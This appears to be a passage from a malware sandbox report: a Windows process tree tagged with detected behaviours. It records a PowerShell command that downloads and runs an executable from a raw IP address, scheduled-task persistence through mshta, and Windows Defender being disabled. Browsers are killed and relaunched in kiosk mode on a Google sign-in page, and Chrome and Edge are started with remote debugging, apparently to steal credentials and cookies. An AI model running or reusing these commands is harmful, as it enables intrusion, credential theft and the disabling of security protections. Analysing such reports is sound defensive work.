C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵PID:5724
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:368
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- System Location Discovery: System Language Discovery
PID:3548 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
PID:2880
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "BlN3RmaYJ3l" /tr "mshta \"C:\Temp\0uMevGCln.hta\"" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1636
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\0uMevGCln.hta"6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1524 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:3112 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3012
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10165970101\47caa411ec.exe"C:\Users\Admin\AppData\Local\Temp\10165970101\47caa411ec.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5528 -
C:\Users\Admin\AppData\Local\Temp\OGLB96BFUO977CR17OZ9DP1ZT.exe"C:\Users\Admin\AppData\Local\Temp\OGLB96BFUO977CR17OZ9DP1ZT.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:976
-
-
-
C:\Users\Admin\AppData\Local\Temp\10165980101\9643d36073.exe"C:\Users\Admin\AppData\Local\Temp\10165980101\9643d36073.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4132
-
-
C:\Users\Admin\AppData\Local\Temp\10165990101\5a290de29e.exe"C:\Users\Admin\AppData\Local\Temp\10165990101\5a290de29e.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4696 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:5952
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4692
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4444
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3176
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:6128
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵PID:2180
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5768 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2072 -parentBuildID 20240401114208 -prefsHandle 1984 -prefMapHandle 1976 -prefsLen 27194 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f2dfc00e-0ca0-4828-88aa-401efc00b621} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" gpu8⤵PID:4992
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2492 -parentBuildID 20240401114208 -prefsHandle 2480 -prefMapHandle 2476 -prefsLen 28114 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6af795a7-c393-4de1-be47-1525db19ecfd} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" socket8⤵PID:4176
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3020 -childID 1 -isForBrowser -prefsHandle 3024 -prefMapHandle 3064 -prefsLen 22636 -prefMapSize 244628 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d8180b0-8e71-4356-a62b-b11768932b63} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab8⤵PID:1948
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4184 -childID 2 -isForBrowser -prefsHandle 4188 -prefMapHandle 4176 -prefsLen 32604 -prefMapSize 244628 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b1a9853-d955-4c30-aa31-8c74f5fab8ec} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab8⤵PID:3552
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4960 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4956 -prefMapHandle 4952 -prefsLen 32604 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf395fe3-9032-45eb-8d5f-a38ce2a9512c} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" utility8⤵
- Checks processor information in registry
PID:6820
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5288 -childID 3 -isForBrowser -prefsHandle 5344 -prefMapHandle 5340 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7e0a3761-fd2e-414f-93f3-6b5d5735c734} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab8⤵PID:5404
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5564 -childID 4 -isForBrowser -prefsHandle 5484 -prefMapHandle 5556 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b0293981-5508-4c74-a84c-56b9c783c95d} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab8⤵PID:6044
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5692 -childID 5 -isForBrowser -prefsHandle 5768 -prefMapHandle 5764 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1308 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5463c5f5-eeed-46eb-89fb-0534ef380cf5} 5768 "\\.\pipe\gecko-crash-server-pipe.5768" tab8⤵PID:5392
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10166000101\650fe465b0.exe"C:\Users\Admin\AppData\Local\Temp\10166000101\650fe465b0.exe"5⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6496
-
-
C:\Users\Admin\AppData\Local\Temp\10166010101\0320a92a1a.exe"C:\Users\Admin\AppData\Local\Temp\10166010101\0320a92a1a.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:7408
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2z6185.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2z6185.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Users\Admin\AppData\Local\Temp\79IPEWNE3VYWXIRFO98X.exe"C:\Users\Admin\AppData\Local\Temp\79IPEWNE3VYWXIRFO98X.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3208
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3i59G.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3i59G.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4932 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""3⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7fffe12fcc40,0x7fffe12fcc4c,0x7fffe12fcc584⤵PID:5092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1828,i,11710561551223166323,5727193887255909569,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1824 /prefetch:24⤵PID:2456
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2188,i,11710561551223166323,5727193887255909569,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2224 /prefetch:34⤵PID:2652
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2288,i,11710561551223166323,5727193887255909569,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2232 /prefetch:84⤵PID:1328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3220,i,11710561551223166323,5727193887255909569,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3252 /prefetch:14⤵
- Uses browser remote debugging
PID:2192
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3396,i,11710561551223166323,5727193887255909569,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3488 /prefetch:14⤵
- Uses browser remote debugging
PID:1708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4552,i,11710561551223166323,5727193887255909569,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4480 /prefetch:14⤵
- Uses browser remote debugging
PID:5276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4736,i,11710561551223166323,5727193887255909569,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4776 /prefetch:84⤵PID:5292
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4788,i,11710561551223166323,5727193887255909569,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4796 /prefetch:84⤵PID:5436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4760,i,11710561551223166323,5727193887255909569,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5020 /prefetch:84⤵PID:5444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4996,i,11710561551223166323,5727193887255909569,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5092 /prefetch:84⤵PID:5788
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4836,i,11710561551223166323,5727193887255909569,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4720 /prefetch:84⤵PID:5956
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5192,i,11710561551223166323,5727193887255909569,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4816 /prefetch:84⤵PID:6028
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5084,i,11710561551223166323,5727193887255909569,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5296 /prefetch:84⤵PID:6108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5440,i,11710561551223166323,5727193887255909569,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4536 /prefetch:84⤵PID:5724
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5332,i,11710561551223166323,5727193887255909569,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5396 /prefetch:24⤵
- Uses browser remote debugging
PID:5748
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"3⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:4212 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7fffe13046f8,0x7fffe1304708,0x7fffe13047184⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,4856036319624429159,11933125752214605677,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:24⤵PID:6112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,4856036319624429159,11933125752214605677,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
PID:5736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,4856036319624429159,11933125752214605677,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2540 /prefetch:24⤵PID:3252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,4856036319624429159,11933125752214605677,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2784 /prefetch:24⤵PID:2132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,4856036319624429159,11933125752214605677,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2616 /prefetch:84⤵PID:3972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,4856036319624429159,11933125752214605677,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2752 /prefetch:24⤵PID:4804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,4856036319624429159,11933125752214605677,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3184 /prefetch:24⤵PID:6116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2088,4856036319624429159,11933125752214605677,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:14⤵
- Uses browser remote debugging
PID:6092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2088,4856036319624429159,11933125752214605677,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:14⤵
- Uses browser remote debugging
PID:6084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,4856036319624429159,11933125752214605677,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3828 /prefetch:24⤵PID:5308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,4856036319624429159,11933125752214605677,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4020 /prefetch:24⤵PID:5816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,4856036319624429159,11933125752214605677,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2712 /prefetch:24⤵PID:3016
-
-
